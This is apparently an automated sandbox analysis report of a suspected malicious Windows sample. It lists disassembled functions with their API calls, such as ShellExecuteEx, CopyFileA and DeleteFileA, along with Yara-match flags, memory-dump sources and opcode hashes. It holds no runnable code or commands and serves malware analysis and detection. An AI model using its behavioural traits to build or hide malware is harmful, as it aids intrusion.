                                                                                                                                                                                                                                                                                                                                  Function 6C624630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                                                  • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a380b5ca0ac3c89d96ed87a1a1d55adf1a7511f064edb2a8a4a08a659a56eabd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e560683bab749a39a599dd596f9cd6e6aba1d41dd33dd746c28dac418b1c20c3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a380b5ca0ac3c89d96ed87a1a1d55adf1a7511f064edb2a8a4a08a659a56eabd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C417631F047089BCB08DF39D88116EBBE5EF86748F10C63DE855AB781EB7498008B4A
                                                                                                                                                                                                                                                                                                                                  Function 6C62B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C613EBD,6C613EBD,00000000), ref: 6C5D42A9
                                                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C62B127), ref: 6C62B463
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C62B4C9
                                                                                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C62B4E4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                                                                  • String ID: pid:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8acbdb9a9fab67beafe1afd2c392746a2b1cbce9390df78a1da7ec393bfa8de0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7172af6adf0d0f842047cd90374b44cd973535e12cbf9afcffa8e628cc2055ea
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8acbdb9a9fab67beafe1afd2c392746a2b1cbce9390df78a1da7ec393bfa8de0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74310531A01208DBDB00DFA9D8C0AEEB7B5FF89318F940529D8126BA41D735A945CFE9
                                                                                                                                                                                                                                                                                                                                  Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004169F5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b08e7233e4262e9fe1b6f44ea8dfa33e94de19d102e1d5655cc3ad81afa8d53e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b08e7233e4262e9fe1b6f44ea8dfa33e94de19d102e1d5655cc3ad81afa8d53e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                                                                                                                                                                                                                                                                                                                  Function 6C61E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61E577
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61E584
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61E5DE
                                                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C61E8A6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1483687287-53385798
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2829931b33c4763fa02bc8e1c5c816aad3069fa8af6cf07da490aa49390f1fcc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: de6f39b18fc37e564f74324d08876a8ea8a6db5cfe551ee54c3d25bd264bb4ac
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2829931b33c4763fa02bc8e1c5c816aad3069fa8af6cf07da490aa49390f1fcc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7118E31604254DFCB00DF1AC488A6ABBF4FFC9328FA00619E88597A51C774A815CBDE
                                                                                                                                                                                                                                                                                                                                  Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00418F08
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                                                                                                                                                                                                                                                                                                                  Function 6C620C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C620CD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C60F9A7
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C620D40
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C620DCB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5F5EDB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: memset.VCRUNTIME140(ewcl,000000E5,?), ref: 6C5F5F27
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5F5FB2
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C620DDD
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C620DF2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d038b936bd1e8d5bf3fc28efe4b88ecc6da77ee36301fe8173694e11811271c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 36527e596418de067379f5ad8b037bd7d2d7b561d352890ca2ec37a0bf86e9a1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d038b936bd1e8d5bf3fc28efe4b88ecc6da77ee36301fe8173694e11811271c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19413871A097849BD720CF29C08079AFBE5BFC9714F608A2EE8D887750DB749845CF86
                                                                                                                                                                                                                                                                                                                                  Function 6C62CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62CDA4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C62D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C62CDBA,00100000,?,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62D158
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C62D130: InitializeConditionVariable.KERNEL32(00000098,?,6C62CDBA,00100000,?,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62D177
                                                                                                                                                                                                                                                                                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62CDC4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C627480: ReleaseSRWLockExclusive.KERNEL32(?,6C6315FC,?,?,?,?,6C6315FC,?), ref: 6C6274EB
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62CECC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C5ECAA2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C62CEEA,?,?,?,?,00000000,?,6C61DA31,00100000,?,?,00000000), ref: 6C61CB57
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C61CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C62CEEA,?,?), ref: 6C61CBAF
                                                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C61DA31,00100000,?,?,00000000,?), ref: 6C62D058
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 90d0d2586928a368136a2525dcab0e5dbb68a76f2760bd365ef092df90374189
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f9bcd84799b1b0d32f958205256c2e87c9bf35607c4ff9904cb323c8c42a3919
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90d0d2586928a368136a2525dcab0e5dbb68a76f2760bd365ef092df90374189
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19D17E71A04B069FD718CF28C480B99F7E1BF89308F01862DD9598B752EB31E9A5CF85
                                                                                                                                                                                                                                                                                                                                  Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93f556de39ff29c28edcc68fbcd2c5b8580d12e93e1aabdf0c81accdaf970599
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f556de39ff29c28edcc68fbcd2c5b8580d12e93e1aabdf0c81accdaf970599
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 6C5F5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetTickCount64.KERNEL32 ref: 6C5F5D40
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65F688), ref: 6C5F5D67
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C5F5DB4
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65F688), ref: 6C5F5DED
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
